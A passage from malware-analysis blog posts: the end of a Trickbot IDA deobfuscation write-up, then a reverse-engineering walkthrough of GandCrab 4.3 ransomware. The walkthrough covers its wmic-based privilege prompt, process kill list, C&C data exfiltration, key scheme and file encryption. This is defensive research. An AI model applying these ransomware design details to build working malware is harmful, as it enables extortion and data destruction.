> * Set comment with current ITP > * If no orphaned comment exists, break loop This algorithm is rather stupid. But after spending too much time on this issue, I was finally happy to have something that works. The result looks like this: SETTING FUNCTION INFORMATION Being able to decrypt all strings and setting them as comments in the decompiled code helps a lot when reversing the binary. What is missing is a properly useable IAT. We already know that the IAT is constructed during runtime on the heap. Function calls to the IAT look like this: The first two lines of the decompilation look as follows in the

disassembly:

You can see in the first line that dword_42A648 is copied to eax, and eight lines later the offset 0xBC is added until a call to register ecx is executing the WinAPI call. The last five lines show a second WinAPI call in a simpler fashion, with only one function argument. The mov instructions in line five to eight are irrelevant for the function call, but the compiler decided to put them between the three pushes for the function arguments of the first call anyways. The idea of how to fix this is quite simple. Yet, the implementation of the idea turned out to be way more complex: We write a light weight implementation of a taint tracker and track the usage of dword_42A648, which holds a pointer to the IAT, to find all WinAPI calls. For each call, our taint tracking provides us the offset within the IAT, so we know which WinAPI is called. In our previous example, we would start with eax, which gets a copy of dword_42A648. Then track eax until it is copied to ecx with the offst 0xBC. Then we track ecx until we see a call to ecx. Thus we know that the IAT offset 0xBC is used at this specific call. In order to tell IDA what kind of return value and parameters each IAT call has, we need to do some more magic. First, we need to import all function definitions we need. E.g. for “SetCurrentDirectoryW” we need to define a function like this “typedef BOOL __stdcall SetCurrentDirectoryW(LPCWSTR lpPathName);”. We import those function definitions as local types in IDA. In the second step, we create a local structure which reflects our IAT. So instead of only naming the pointer e.g. “CreateThread”, we also use the type CreateThread, which we imported as local type. This IAT structure is then applied to the address dword_42A648, so we can see which function is called when dword_42A648 is referenced. The decompilation of e.g. sub_402B00 then looks like this: We can see three calls to WinAPIs and their corresponding names in line 18, 31 and 34. Yet, neither the number of function arguments are correct, nor are their types identified properly. For example, in line 18 IDA shows five function arguments where there should be four and in line 31 there is one where there should be three. Additionally, the structure PSECURITY_DESCRIPTOR is not set as the third argument in line 18, instead IDA set it to void*. And instead of LPSECURITY_ATTRIBUTES, IDA uses an int* in line 31. In order to fix this, we can now leverage our taint tracking information and define each call with its corresponding function by using the IDA Python functions apply_callee_tinfo() and set_op_tinfo2() of the idaapi. This triggers IDA’s magic and populates the added information to the disassembly, so that even stack variables are redefined and renamed. We can now see that the function calls have the correct number of arguments as well as the correct types of arguments. Also the stack variables got redefined and renamed correctly. You always know you are going down a very dark trail when the IDA Python functions you are using have less than 10 hits on google and most of those hits are just copies of the same text. Yet, I found the existing IDA Python script “apply_callee_type.py”

from Jay Smith on

https://github.com/fireeye/flare-ida/blob/master/python/flare/apply_callee_type.py extremely helpful in understanding how to do such magic in IDA. The final pseudo algorithm looks like this: > * Iterate over the decrypted IAT and for each imported function:

>

> * Look up function definition in IDAs database > * Import function definition to local types for later use

>

> * Create IAT structure and import it as local type called

> “IAT”

> * Set dword_42A648 as type “IAT”

>

> * For each read-reference to dword_42A648

>

> * Get the register which holds dword_42A648 > * Disassemble forward until the register is copied with an offset > to a new register, remember the used offset > * Disassemble forward until the new register is called, remember

> this address

> * Depending on the used offset, look up the function definition of > the IAT function > * Apply function definition to current address

CONCLUSION

In the first part we have learned how Trickbot obfuscates its strings and how we can leverage static code analysis in order to deobfuscate the strings and put them in a useable format in IDA. In the second part we analyzed how the dynamically created import address table of Trickbot can be restored and how IDA can be instrumented to process the data types of the imported functions to get a nice and clean decompilation result. Finally, I would like to thank my colleagues from G DATA Advanced Analytics for proofreading this article. Additionally, I would like to thank the Trickbot authors for the interesting and partially challenging malware. You can find the IDA Python scripts on https://github.com/GDATAAdvancedAnalytics/IDA-Python Author Robert Michel

Posted on March 22,

2019March 22, 2019

INTRODUCTION

GandCrab is a ransomware that has been around for over a year and steadily altered (I explicitly do not say “improved”) its code. The author(s) version their builds, the version I analyzed in this blog post is GandCrab’s interal version 4.3 with the Sha256 c9941b3fd655d04763721f266185454bef94461359642eec724d0cf3f198c988. GandCrab has been around for a while, but gained relevance for us, when we received incoming requests for incident response engagement, primarily from medium-sized companies. On the 24th of August 2018 GandCrab started to push some e-mail based campaigns against German speaking countries, as already described by our esteemed colleague

Hauke here

https://www.gdata.de/blog/2018/09/31078-professionelle-ransomware-kampagne-greift-personalabteilungen-mit-bewerbungen-an (G DATA’s corporate blog is typically obfuscated in German). In the meantime Bitdefender released a tool to decrypt several variants of GandCrab, including the analyzed one https://labs.bitdefender.com/2018/10/gandcrab-ransomware-decryption-tool-available-for-free/ To the best of our knowledge, the tool does not use any flaw in the encryption of GandCrab, but it uses a copy of the master private key, which can be used to revert the whole encryption. Details on how the encryption is done by GandCrab can be found later on in this article.

MOTIVATION

We analyzed GandCrab as needed, when initially starting with the analysis, we had about zero knowledge about the internal details of GandCrab. This article is meant as a walkthrough of the analysis process, with some focus on the execution flow of GandCrab, as well as the analysis of the kernel driver exploit comprised in this sample. As we are documenting in retrospect, various blog posts on GandCrab already exist that document its features, tricks and oddities. You can find a very good feature comparison and timeline here https://www.vmray.com/cyber-security-blog/gandcrab-ransomware-evolution-analysis/, you can find an additional timeline, a few details about the kernel driver exploit added in version 4.2.1 as well as an explanation of the latest feature of each version here https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html STARTING THE ANALYSIS

UNPACKING

The step of unpacking the sample will be skipped here, as it takes around 30 seconds if you have the correct setup and know what you will expect in the unpacked form. At our first encounter with the sample, we didn’t know what to expect, so it took us a few minutes. REMOVING THE JUNK CODE When putting the sample into IDA, you are first greeted by a scrambled main function, which trips IDA a bit up. After rolling my eyes and being afraid I had not unpacked the sample properly, I looked at some random functions identified by IDA and noticed, that most of the code looked readable, but several functions also had the same anti-disassembling trick. Hoping to see a cool VM packer or some advanced obfuscation tricks, I started to analyze the junk code, which starts at the first call in

line number 3.

Obviously, the two conditional short jumps two instructions later point to a location which was not properly disassembled by IDA. After fixing the disassembly of the jump target, the code looks like this. So, reading the disassembly, we have a call, which only pushes the return address on the stack. This return address, being the topmost stack element, is then increased by 0x11. In the next step, depending on the state of the ZF bit (or simply “zero flag”), either the JNZ or the JZ condition triggers and jumps to the pop eax, jmp eax instructions, which pop the altered return address from the stack and jump to it. Disassembling the jump target two bytes after the jump itself yields us the following result: We can see that the jmp eax leads us to the call to address 0x40414B. Since afterwards the ExitProcess is called, we can assume that 0x40414B is the main function of GandCrab. Disassembling this function in IDA looks like this: Well, we’ve seen this byte sequence at the function prologue

somewhere before…

In case you’re only reading the text and not really looking at the pictures, you might have missed that the function prologue is not only looking the same for both functions we have seen so far, but it is the very same byte sequence. Also, IDA did not notice that a new function starts at address 0x40414B, which is why it placed the “loc_40414B” label there. After succeeding in decompiling the function when simply NOPing out the junk instructions by hand, I wrote a short IDA python script to patch all locations where the junk instructions where:

> _import idaapi_

> _tmp = "E8 00 00 00 00 3E 83 04 24 11 75 05 74 03 E9 28 14 58 FF E0 00 E9"_ > _patchbytes = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"_

>

> _cur = 0_

> _while cur != 0xffffffffL:_ > _ cur = FindBinary(0, SEARCH_DOWN, tmp)_ > _ print hex(cur)_ > _ idaapi.patch_many_bytes(cur, patchbytes)_ The Python script prints each location where it patched something, so I could then check if IDA detected this location as the start of a function and test if I could decompile it. Of course, defining a function could also be done by a script, but for 29 functions, this was still doable by hand, and the IDA API is also not the most intuitive API to use when you’re in a bit of a hurry. So yep, patching was rather trivial, as Fortinet confirmed:https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html FOLLOWING THE EXECUTION FLOW After a few small hurdles described before, we can start looking at GandCrab and analyze the execution flow step by step. Before doing so, here is a reference of what we’re going to see and which functions calls which one. Since there will be a lot of function calls and returns, it is easy to get lost, so take this as a reference (maybe put it on a second screen, print it, open it in a second tab, …) while you’re reading the rest of this article:

> main

> ----Eleveate Privileges > ----closeRunningProcesses

> ----mainFunction

> --------bIsSystemLocaleNotOk > --------bCheckMutex > --------decryptPubKey > --------0x00401C56 > --------0x00405B7D

> --------encRC4

> --------internetThread > ------------0x004047BD > ------------contactCnC > --------startEncryption > ------------decryptFileEndings > ------------createRSAkeypair > ------------saveKeysToRegOrGetExisting > ----------------getKeypairFromRegistry > ----------------encrypPubKey > --------------------getRandomBytes > --------------------importRSAkeyAndEncryptBuffer > ----------------writeRegistryKeys > ------------createUserfileOutput > ------------concatUserInfoToRansomNote > ------------startEncryptionsInThreads > ----------------encryptNetworkThread > --------------------enumNetworksAndEncrypt > ------------------------loopFoldersAndEncrypt_wrapper > ----------------------------loopFoldersAndEncrypt > --------------------------------... > ----------------prepareEncryption > ----------------encryptLocalDriveThread > --------------------loopFoldersAndEncrypt > ------------------------0x0040512C > ------------------------0x004053FD > ------------------------0x00405525 > ------------------------encryptFile > ----------------------------bIsFileEndingInBlacklist > ----------------------------bIsFilenameOnBlacklist > ----------------------------encryptionFunc > --------------------------------... > --------deleteShadowCopies

> ----AntiStealth

> ----deleteSelfWithTimeout We’re beginning at what I call the main function at 0x0040414B. It

starts very simple:

The first function call to a function named “nullsub_1” by IDA is, as the name already implies, nothing interesting: Those kinds of functions are often generated by compilers if you remove the content of a function by preprocessor directions like “#ifdef DEBUG”. I suppose the author(s) of GandCrab either placed some debug string or breakpoint there when compiling the debug version. And since we are looking at the release compilation, the

function is empty.

ELEVATING PRIVILEGES The next part of the main function is a simple check if the sample is running on Windows Vista or newer. If so, GandCrab checks if the current process is running with integrity level low or even lower. If that is also the case, a very cheap but simple trick is used to gain normal user privileges: By calling the WinApi ShellExecuteW with “%windir%\system32\wbem\wmic” as “lpFile” parameter, “runas” as “lpVerb” parameter and “process call create \”cmd /c start %s\”” as “lpParameters”, GandCrab starts a process that asks the user to execute a command line with normal user privileges, which in turn starts GandCrab from the command line. After the new process is started, the initial process ends itself by calling

ExitProcess(0).

As you can see in the first lines of the screenshot, GandCrab obfuscates the strings by filling the wchar array during runtime with _mov_ instructions. This is also a well-known trick for string

obfuscation.

Given the distribution methods of GandCrab, where also Exploit Kits are used, this kind of functionality makes sense: Most exploit kits nowadays only deliver exploits to gain code execution via bugs in browsers or browser plugins. And all major browsers try to sandbox their worker processes in low or even zero privileged process containers. So, a successful exploit against a modern browser will initially run with low or zero integrity level, unless a second exploit is fired to elevate the processes privileges. GandCrab goes the easy way and instead of firing a privilege escalation exploit, it simply asks the user for more privileges, but does this in a very sneaky way. Those user level (aka. medium integrity) rights are needed to later encrypt the user’s files. In the above screenshot you can see what happens if you run GandCrab on a German Windows 8 with low integrity: The UAC dialogue pops up. You might have noticed that the whole privilege escalation is wrapped in a loop with 100 tries, which makes it very dangerous for average users. You either have to click “No” 100 times, or you execute GandCrab with medium integrity. ENSURING FILE ACCESS So GandCrab either already has enough privileges, or it tries to start a new process with enough privileges with the user’s help. In any case the execution flow then goes back to the main function, where the next call to 0x00403F7D, a function which I named “closeRunningProcesses()”, takes place. First, GandCrab fills an array, called _lpString1_ by IDA in the screenshot, with string pointers. Then, by using the _CreateToolhelp32Snapshot_ API with the _TH32CS_SNAPPROCESS_ flag, it iterates over all running processes and checks each process name against the list in the _lpString1_ array. Each matching process is being opened and terminated, if GandCrab gets the according process

handle.

The full list of process names is: > msftesql.exe, sqlagent.exe, sqlbrowser.exe, sqlwriter.exe, > oracle.exe, ocssd.exe, dbsnmp.exe, synctime.exe, > agntsvc.exeisqlplussvc.exe, xfssvccon.exe, sqlservr.exe, > mydesktopservice.exe, ocautoupds.exe, agntsvc.exeagntsvc.exe, > agntsvc.exeencsvc.exe, firefoxconfig.exe, tbirdconfig.exe, > mydesktopqos.exe, ocomm.exe, mysqld.exe, mysqld-nt.exe, > mysqld-opt.exe, dbeng50.exe, sqbcoreservice.exe, excel.exe, > infopath.exe, msaccess.exe, mspub.exe, onenote.exe, outlook.exe, > powerpnt.exe, steam.exe, sqlservr.exe, thebat.exe, thebat64.exe, > thunderbird.exe, visio.exe, winword.exe, wordpad.exe Using my favorite open source intelligence tool, called Google, and searching for some of those process names, you can find a list from a Cerber sample which around two years ago did the very same thing. https://www.bleepingcomputer.com/news/security/cerber-ransomware-switches-to-a-random-extension-and-ends-database-processes/ The only difference is, that the list of Cerber has less entries. Yet, GandCrab seems to have copied the exact list. Even the order of items is nearly the same. GandCrab only added some entries at the end of the

list.

The reason for this feature is as follows: Those processes might have open handles on important files, which might block GandCrab in getting a writeable handle on those files when trying to encrypt them. So it kills those processes to ensure it can access the files which otherwise might be blocked.

THE MAINFUNCTION

Once GandCrab has ensured that a bunch of processes have been killed, the execution flow goes from the main function to a function which I called mainFunction at 0x0040398C. It might not have been my brightest idea to name the first function “main” (0x0040414B) and one of the following sub-functions “mainFunction” (0x0040398C), but let‘s stick with it for now. In this function most of the GandCrab functionality takes place. Anti-Debugging/Emulator/Sandbox tricks, gathering and sending telemetry to the C&C, threading, encryption, as well as taunting IT

security companies.

As this function is a bit bigger, I cut the screenshots in parts to explain the single steps. GANDCRAB DOES NOT LIKE EMULATORS AND SANDBOXES We start with a simple Anti-Emulator/Sandbox trick: By Calling OpenProcess() with invalid arguments, and a subsequent check for the error code, GandCrab ensures that no one is fiddling with the OpenProcess-API. Some simple emulators or sandboxes might always return “success” and will thus not set the expected error code, which is probably what this part is trying to detect. GANDCRAB IS AFRAID OF RUSSIANS AND CYRILLIC KEYBOARDS In bIsSystemLocaleNotOk() at 0x00403528, GandCrab looks if a Russian keyboard is installed, or if the system’s default UI language is on the internal blacklist. In both cases GandCrab stops its execution and deletes itself from the system by calling deleteSelfWithTimeout() at

0x004032CE.

THERE CAN BE ONLY ONE GANDCRAB The next check in bCheckMutex() at 0x00403092 tries to avoid that several instances of GandCrab run at the same time. By creating a named mutex via CreateMutexW() and subsequently checking for the error codes ERROR_ACCESS_DENIED and ERROR_ALREADY_EXISTS, it ensures that the mutex is created and the function fails if the mutex already

exists.

With the mutex name, GandCrab starts its first taunt against Ahnlab.

According to

https://www.fortinet.com/blog/threat-research/a-chronology-of-gandcrab-v4-x.html, the text in the picture behind the link in the string buffer translates to “_I added you to my gay list. I used a pencil for the time being_“. Since I don’t speak Russian, you have to take Fortinet’s word for the translation. SHIPPING ITS OWN PUBLIC KEY With the next call to decryptPubKey() at 0x004038DA, a public key stored in the .data section is decrypted. The decrypted key is put on heap memory and the pointer to the memory stored in a global variable

for later use.

The public key is first XORed with 5 and afterwards decrypted with the Salsa20 stream cipher. The decryption key for the stream cipher is a greeting to the inventor of the Salsa20 algorithm, Daniel Bernstein, who is also addressed by his Twitter handle @hashbreaker. IM IN UR MACHINE, STEALING UR INFOZ In the next two subsequent calls to 0x00401C56 and 0x00405B7D (not shown in any screenshot), GandCrab initializes an internal structure and then fills it with information about the current system. Most of the data in this structure is organized in groups of three. The first element is a boolean value set during initialization of the structure which controls if the next two elements are used. Those next two elements are a static name set during initialization and a value calculated during runtime (think of it like a key/value pair in JSON).

E.g.

> DWORD bShouldFillDomainName; //set to 0/1 during initialization > DWORD pc_group; //static name > DWORD domainName; //calculated during runtime By using this format, GandCrab can read the following information from the target computer, if configured to do so:

* User Name

* Computer Name

* Domain Name

* Installed AV Product

* Keyboard Locale

* Windows Product Name * Processor Architecture * Volume Serial Number * CPU Name (as defined in HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0) * Type of each attached drive (as defined by GetDriveTypeW()) * Free disk space of each attached drive Additionally, a “ransom_id” is calculated by getting the ntdll.RtlComputeCrc32() of the CPU name with the initial CRC 666 as seed, transforming this DWORD into a string and then concatenating the volume serial number of the volume on which Windows is installed. The whole structure of stolen information is then serialized into a string in the form of “key1=value1&key2=value2” and then two IDs are added, as well as the version information. Afterwards the whole string is encrypted with RC4 and the static key “jopochlen” in 0x00404B66, which I called encRC4. In between those string concatenation functions, you can see another mock of Ahnlab: GandCrab claims to have a possible write-what-where kernel exploit with a privelege escalation for their security suite Ahnlab V3 Lite. You can read about the analysis of this exploit later in this article.

GANDCRAB HOME PHONE

Once the information about the infected system has been gathered, a thread is started which pushes this information on the C&C server, starting at 0x004048D7, called internetThread(). This part is rather weird, but very effective in regards to network based IDS/IPS as well as sinkholing attacks against the C&Cs of

GandCrab.

It starts with GandCrab decrypting a huge char array with the previously seen XOR algorithm. As this blob is very huge, I’m not showing it here. It contains 960 different domains and IPs separated by a semicolon. For each of those domains/IPs the function 0x004047BD is called. In this function, several randomized strings are generated, which form a random path for

the C&C URI.

The first random string is one of those seven. The seed of the randomness is based on GetTickCount(). The second random string is chosen from one of the eight strings shown

above.

The third string is built a little bit more complex. From a pool of 16 two-char strings, one is chosen randomly. Then, depending on further random numbers, between zero and five more times a random string from the same pool is concatenated. The result is later used as file name in the URL’s path. The fourth and last random string is one of the four file name extensions shown above (since the char* array from the first random string is re-used for the fourth random string, the offset starts at 3 instead of 0, which looks odd in the screenshot). Then, with the call to wsprintfW(), the URL is built and the function contactCnC() at 0x00404682 is called, which ultimately sends the gathered system information to the C&C server. In contactCnC() there is not too much interesting to show. The already serialized and RC4 encrypted system information is accessed via a global variable (which is why you can’t see it as an argument in the above screenshot) and is then getting base64 encoded before being

transmitted.

Before sending the information to the C&C server as multipart/form-data in a POST-request, GandCrab first contacts the domain with a GET request to decide on the HTTP status code (30x), whether the server should be contacted with HTTP or HTTPS. What GandCrab does is actually easy to describe, but it poses a few problems for defenders and analysts. Most of the domains/IPs contacted by GandCrab are benign websites from real companies or organizations. So, I assume that GandCrab either sneaked at least one of their C&C domains/IPs in there, or GandCrab compromised one of those legit websites to receive C&C traffic. We didn’t follow up on that aspect

so far.

By sending the stolen information to several hundred of domains/IPs, it is hard to block the C&C communication based on domains/IPs, because you would block a lot of benign websites, too. If you use a network-based IDS/IPS, it is also not trivial to detect or block GandCrab traffic based on the URL, since there are a lot of randomizations in there and it is not easy to tell those URLs apart

from legit URLs.

ENCRYPT ALL THE THINGS! After starting the thread that calls the C&C server, the mainFunction() initializes three critical sections, of which only one

is used at all.

Then, with a call to the function startEncryption() at 0x00402E60 the actual encryption of files on the system starts. In the first call to decryptFileEndings() at 0x00402E14 a list of file endings is decrypted with the already known XOR loop. This list is later used to exclude files from encryption based on their file

ending.

The excluded file endings are: > .ani .cab .cpl .cur .diagcab .diagpkg .dll .drv .lock .hlp .ldf .icl > .icns .ico .ics .lnk .key .idx .mod .mpa .msc .msp .msstyles .msu > .nomedia .ocx .prf .rom .rtp .scr .shs .spl .sys .theme .themepack > .exe .bat .cmd .gandcrab .KRAB .CRAB .zerophage_i_like_your_pictures As a second step in createRSAkeypair () at 0x00404BF6, a 2048 bit RSA keypair is created. This keypair is then put into to the function I called saveKeysToRegOrGetExisting() at 0x00402B85. Here are two branches: If the registry path “HKCU\SOFTWARE\keys_data\data” exists, the previously generated keypair is thrown away – WTF? Why generate it in the first place? – and the registry keys “private” and “public” are read from said path via getKeypairFromRegistry() at 0x0040298D and used further on. Please note that the registry name “private” is actually not only the private key, but a slightly more complex buffer, as you can see when looking at the second branch, in case the registry path does not exist. The second branch is executed if the registry path does not exist. A call to encrypPubKey() at 0x00402263 is executed. First a random IV and a random key are generated – getRandomBytes() uses advapi32.CryptGenRandom(), so it is probably really random and not some pseudo random rand() function. Those two random values are then used to encrypt the private key with

Salsa20.

The function importRSAkeyAndEncryptBuffer() imports a public RSA key and uses it to encrypt the provided buffer. Note that not the previously generated public key is used here, but the g_Mem_pubkey, which was decrypted in the beginning of the main function. In order to understand what is actually encrypted by importRSAkeyAndEncryptBuffer() it is important to know how the structure behind the outBuf pointer looks like, so here is my IDA Local Type definition:

> #pragma pack(1)

> struct keypairBuffer

> {

> DWORD privkeySize;

> char salsaKey;

> char IV;

> char privKey;

> }

You can now see that all 0x100 bytes starting at keypairBuffer->salsaKey and all 0x100 bytes of keypairBuffer->IV are encrypted.Although the key is only 32 bytes and the IV only 8 bytes long, if you look at the first argument of getRandomBytes(). GandCrab still encrypts the whole buffer, including lots of unused null bytes.

�\_(ツ)_/¯

Yet, this means, that without the private key of the embedded g_Mem_pubkey, you cannot decrypt the Salsa20 key and IV. And without this Salsa20 key and the IV, you cannot decrypt the locally generated

private RSA key.

Unfortunately, this looks like solid use of cryptography to me. Of course with a call to writeRegistryKeys() at 0x00402AAD the public key of the previously generated RSA keypair is written to the registry key “public” and the whole encrypted keypairBuffer structure is written to the registry key called “private” in the above mentioned registry path. Back in the startEncryption() function, as a next step the memory of the generated private RSA key is freed in order to avoid having it in clear text in memory during runtime. Then, with a call to createUserfileOutput() at 0x004023CF, a part of the GandCrab ransom note is generated. The encrypted keypairBuffer is base64 encoded and by using a global variable the RC4 encrypted and base64 encoded system data previously generated in the mainFunction() are concatenated with the following strings: > ---BEGIN GANDCRAB KEY--- > > ---END GANDCRAB KEY--- > ---BEGIN PC DATA--- > > ---END PC DATA--- With the subsequent call to concatUserInfoToRansomNote() at 0x00402C36 the rest of the ransom note is decrypted with the same XOR loop as before, but this time 0x10 is used as XOR key. Within this text the placeholder {USERID} is searched and substituted with the previously mentioned “ransom_id” (CRC32 over CPU name + Windows volume serial number). The {USERID} string is part of the path parameter of the URL of GandCrab’s hidden service: “http://gandcrabmfe6mnef.onion/{USERID} “ Thus, each machine infected with GandCrab gets a unique ransom note, where the link includes the identifier of the infected machine. Additionally, the ransom note holds all information needed to decrypt a file, if you have the private key belonging to the public key that is stored within GandCrab’s .data section. It is funny to note that in concatUserInfoToRansomNote() not the already calculated and known ransom_id is used, but the whole previously mentioned internal structure containing information about the current system is built again. Only this time all but one of the bShouldFillDomainName bits are not set. So, the needed values are read and calculated a second time. By calling startEncryptionsInThreads() at 0x0040211E, GandCrab starts several threads which take care of the encryption: The first thread starts at the function encryptNetworkThread() at 0x00402097, which will be described in the next subsection. Then, by calling prepareEncryption() at 0x00401D84, the driveInfos structure gets filled, containing the number of processors minus one (minimum one), the number of drives to encrypt and a list of drives to

encrypt.

The list of drives to encrypt is filled by iteratprovides ing over the alphabet (from A to Z), calling GetDriveTypeA() for each letter and checking if the drive type is DRIVE_REMOVABLE, DRIVE_FIXED, DRIVE_CDROM or DRIVE_RAMDISK. This specifically excludes all drives of type DRIVE_REMOTE, which should be already handled by the thread running encryptNetworkThread(). Back in startEncryptionsInThreads(), after prepareEncryption() has been executed, you can see in the for-loop for each drive, addressed by its drive letter, number of processors minus one threads are spawned, which call the encryptLocalDriveThread() function at 0x00401D1C, which will be described in one of the following

subsections.

The main thread then waits for all threads running on the current drive to finish by calling WaitForMultipleObjects(). As soon as one drive is finished and all according threads end, the next drive is encrypted with the same number of threads, and so on. At the end of the function, the main thread waits until the encryptNetworkThread()-thread has finished by calling WaitForSingleObject(). NETWORK ENCRYPTION – IM IN UR NETWORK, ENCRYPTING UR SHAREZ The encryptNetworkThread() function at 0x00402097 does nothing more than resolving the computer’s name and providing this information to the function I called enumNetworksAndEncrypt() at 0x00401EA2 together with the crypto keys which were provided in the threadArgs structure. It is weird to see that the computer name is not actually used in the enumNetworksAndEncrypt() function. So maybe it was once used and the authors forgot to remove it, or it is part of an upcoming feature, which is still in development. Nonetheless, from the control flow point of view it makes no sense to query the computer name here.

�\_(ツ)_/¯

So the actual beef we are looking for is in the function enumNetworksAndEncrypt().The main part of this function looks like

this:

The function has two parts, the upper half and the lower half, each marked by a call to WNetOpenEnumW(). In the first half, a maximum of 128 previously known network disks are enumerated by calling WNetOpenEnumW() with the RESOURCE_REMEMBERED and RESOURCETYPE_DISK arguments. Then, for each found network resource of type DISK, the function I called loopFoldersAndEncrypt_wrapper() at 0x00401E47 is executed. For each network resource of type RESOURCEUSAGE_CONTAINER, the currently executed function enumNetworksAndEncrypt() is executed recursively to further enumerate the network resources in the found container at the second half of the function. The second half of the function does pretty much the same as the first half, the only two differences are that for the enumeration the argument RESOURCE_GLOBALNET is used, in order to enumerate the whole network, and not only the previously used resources, and that the argument argument_NetResource is used in WNetOpenEnumW(), which makes the recursive calls possible. Note that in the first call to enumNetworksAndEncrypt() the argument_NetResource is zero, which starts the enumeration at the root

of the network.

To sum it up:

GandCrab first enumerates up to 128 network disks and encrypts them based on all “remembered (persistent) connections”, according to MSDN. Additionally, GandCrab enumerates and encrypts up to 128 network disks starting at the root of the local network. For each resource container a recursion is made. ENCRYPTING LOCAL DRIVES – IM IN UR MACHINE, ENCRYPTING UR LOCAL

DRIVEZ

The encryptLocalDriveThread() function at 0x00401D1C is nothing more than a wrapper around the loopFoldersAndEncrypt() function at 0x00405653, and forwards the crypto keys and the root of where the encryption should start. The function loopFoldersAndEncrypt() is not very pretty to look at, so there is no screenshot to describe everything in one picture, but rather several smaller screenshots. The function takes three arguments: The keys need for encryption, the current path where the files and folders are to be iterated and a boolean value, which is used to avoid iterating and encrypting everything in paths containing the string “Program Files” or “Program Files (x86)”, unless the path additionally contains the

string “SQL”.

Before starting to recursively iterate over files and folders, GandCrab does some checks on the current path by calling the function

at 0x0040512C.

The function has two ways of returning a value. An output parameter and the classical ret-instruction with eax. If the current folder contains the string “Program Files” or “Program Files (x86)”, the pointer bProgramFiles_1 is set to “true”, and thus returns the information via an output parameter. If one of the other folders listed above is found, the function’s return value stored in bRet is set to “true” and returned via eax and a ret-instruction. Note that GandCrab tries to ensure that the system can still be booted by excluding the folders “Boot” and “Windows”, and tries to ensure you can still pay your ransom by not encrypting the Tor Browser files. It also spares all files installed in “Program Files” or “Program Files (x86)”, unless they contain the string “SQL”, as you can see in the encryption loop later on. Further on in loopFoldersAndEncrypt() it is then checked if the current path is in one of the special folders. If this is the case and the folder is not in “Program Files” or “Program Files (x86)”, the function returns, thus breaking the recursion and not encrypting the files in the current folder. In the next step, GandCrab creates the ransom note for the current folder with the hard-coded string KRAB-DECRYPT.txt and the text content which was previously calculated by calling 0x004053FD. In case the ransom note already exists, GandCrab also breaks the recursion by

returning.

After that, by calling the function at 0x00405525, a lock file is created by the following algorithm: By mangling the serial number of the drive where Windows is installed with the current day, month and week, as well as some constants, a string is created, which is unique for the current computer at the current day. This string is then used to create a file with the flag FILE_FLAG_DELETE_ON_CLOSE, which keeps the file alive as long as the current file handle is open. The handle is closed after the iteration step in the current folder is finished, thus deleting the file once the current folder and all its sub-folder have been encrypted. In case the file already exists, the recursion loop is broken by returning. This mechanism is used to synchronize the different threads running in parallel, so that only one thread encrypts the same folder. This means that the file is a marker that a thread is currently recursively running through the current folder. Note that this only works if GandCrab is not running over midnight, because a change in wDay and wDayOfWeek will change the file name.

�\_(ツ)_/¯

But, the creation of the ransom note already provides a synchronization token, since it breaks the recursion in case a file with the name of the ransom note is already in the current folder. Additionally, there is another mechanism to avoid encrypting the same file twice later on. The actual recursive loop for iterating over files and folders in loopFoldersAndEncrypt() is as simple as it can be: By using the WinAPI FindFirstFileW() (not in screenshot) and FindNextFileW(), GandCrab iterates over the content of the current folder. If a sub-folder is found, the current function calls itself recursively to iterate the sub-folder. For each file that is found, the function encryptFile() at 0x004054B8 is called. Note that the function behaves differently, if the bSQLfoldersOnly variable is set. This is the case, if the current folder is in “Program Files” or “Program Files (x86)”. If the folder then contains the string “SQL”, the recursion is executed with the third argument set to “true”, which then implicitly always sets the bSQLfoldersOnly to true. This ensures GandCrab does not encrypt anything in “Program Files” or “Program Files (x86)”, unless it has something to do with SQL. DOUBLE CHECK TO ENCRYPT ONLY THE TARGETED FILES The function I called encryptFile() first does several checks on the current file before it actually encrypts it. First, the current file’s name is copied and extended with the ending “.KRAB”. Then a check on the original file ending of the current file is done. Here the file ending blacklist mentioned before is used to avoid encrypting files with a certain file ending. Note that “.KRAB” is on that blacklist, so it avoids encrypting a file twice. Additionally, to keep the system running and bootable, no executables, DLLs, drivers, etc. are encrypted. Then, by calling bIsFilenameOnBlacklist, GandCrab checks if the current file is one of a hard-coded list of filenames. This once again ensures that the system stays bootable – you should be able to pay your ransom after all. But since GandCrab does not want to blacklist those files by their extension, because there could be user files with those extensions, GandCrab decided to exclude only a few specific files from encryption. If the file name is ok and the file has at least two Bytes, the encryption is started by calling encryptionFunc() at 0x00401AA7. After the encryption, the file is renamed into the file name with the .KRAB ending by calling MoveFileW(). THE ACTUAL ENCRYPTION The actual encryption of each file takes place in encryptionFunc(). There are two function arguments. The first is the path to the file to be encrypted and the second one is a pointer to a structure I called cryptKeys and is defined as follows: > struct cryptKeys

> {

> void* pubkey;

> void* privkey;

> void* privkeySize; > void* pubkeySize; > keypairBuffer *keypairBuffer;

> };

Although the struct has several different members, only the pubkey and the pubkeySize are used here (remember that the private key buffer has already been freed at this point). For each file to be encrypted, a function call to 0x004019F8 creates a new random IV of 8 bytes and a symmetric key for the Salsa20 algorithm of 32 bytes (not in screenshot). Those two random values are then encrypted with the previously created RSA public key and stored in the structure I called encryptionInfoBlob in the following screenshot. GandCrab is reading the file in chunks of 1 MB, then adds the number of read bytes to the encryptionInfoBlob structure, encrypts the 1 MB blob, moves the file pointer back by 1 MB and writes 1 MB of encrypted data. In case less than 1 MB was read, the sizes are adapted accordingly and the loop finishes. Once the whole file is encrypted, GandCrab adds the encryptionInfoBlob structure to the end of the file. The structure looks like this: > struct encryptionInfoBlob

> {

> byte encryptedSymkey; > byte encryptedIV; > LARGE_INTEGER encryptedBytes;

> }

So, each file is fully encrypted in chunks of 1 MB with Salsa20, no matter how big the file is. For each file a new Salsa20 key and IV are randomly created and then stored at the end of the file after they are encrypted with the RSA public key, which was newly created during the run of GandCrab. Additionally, the number of encrypted bytes is also added at the end of each file.

DELETESHADOWCOPIES

